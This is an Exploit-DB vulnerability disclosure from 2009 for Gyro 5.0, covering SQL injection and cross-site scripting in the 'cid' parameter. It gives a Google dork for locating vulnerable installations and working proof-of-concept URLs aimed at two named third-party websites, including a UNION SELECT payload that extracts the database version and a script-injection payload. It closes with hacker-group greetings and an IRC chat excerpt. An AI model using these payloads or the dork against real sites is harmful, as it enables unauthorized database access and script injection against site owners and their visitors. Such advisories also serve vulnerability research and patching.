gyro 5.0 sql/XSS Multiple Vulnerabilities

2009-09-11T00:00:00
ID EDB-ID:9640
Type exploitdb
Reporter OoN_Boy
Modified 2009-09-11T00:00:00

Description

Gyro 5.0 (SQL/XSS) Multiple Remote Vulnerabilities. CVE-2009-3348,CVE-2009-3349. Webapps exploit for php platform

                                        
                                            [+]=================================================================[+]
	____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ 
	||A |||n |||t |||i |||S |||c |||e |||r |||u |||t |||i |||y ||
	||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
	|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
	------------------------------------------------------------
				http://antisecurity.org
[+]=================================================================[+]
		[x]Title    : Gyro V5.0 [Sql/Xss] Multiple Remote Vulnerabilities
		[x]Software : Gyro V5.0
		[x]Vendor   : http://www.datavore.com
		[x]Date     : 11 September 2009 ( Indonesia ) 
		[x]Author   : OoN_Boy
		[x]Contact  : oon.boy9@gmail.com
		[x]Blog     : http://oonboy.blogspot.com
		[x]Website	: http://oonboy.info
[+]=================================================================[+]
		[x] Google Dork

		"powered by Gyro V5.0"
[+]=================================================================[+]
		[x] Exploit
		http://localhost/home?op=cat&cid=[sql]
		http://localhost/home?op=cat&cid=[Xss]
		
		[x] Proof of concept
		http://www.vansda.ca/home?op=cat&cid=29+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--
		http://www.vansda.ca/home?op=cat&cid=29"><script>alert(123456)</script>
		http://www.phpmath.com/home?op=cat&cid=29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--
		http://www.phpmath.com/home?op=cat&cid=29"><script>alert(123456)</script>
[+]=================================================================[+]
        [x] Greetz

        Antisecurity[dot]Org www.BatamHacker.or.id www.MainHack.com  www.ServerIsDown.org - 
	    Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
	    zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia,
	    str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^

[+]=================================================================[+]
	    [x] Wew
		[03:49] <&OoN_Boy> ============================
		[03:49] <&OoN_Boy> [03:48] <&chawanua> mentang2 dah jadian ama si noge ..
		[03:49] <&OoN_Boy> [03:48] <&Jack> xixixi
		[03:49] <&OoN_Boy> [03:48] <&Jack> maap maap
		[03:49] <&OoN_Boy> [03:48] <&Jack> :D
		[03:49] <&OoN_Boy> [03:48] <&chawanua> si bob ko tinggalin 
		[03:49] <&OoN_Boy> [03:49] <&Jack> aq homo, begitu jg dirimu
		[03:49] <&OoN_Boy> ============================
[+]=================================================================[+]
           ---------===Jangan Ngambek Jack ===---------

# milw0rm.com [2009-09-11]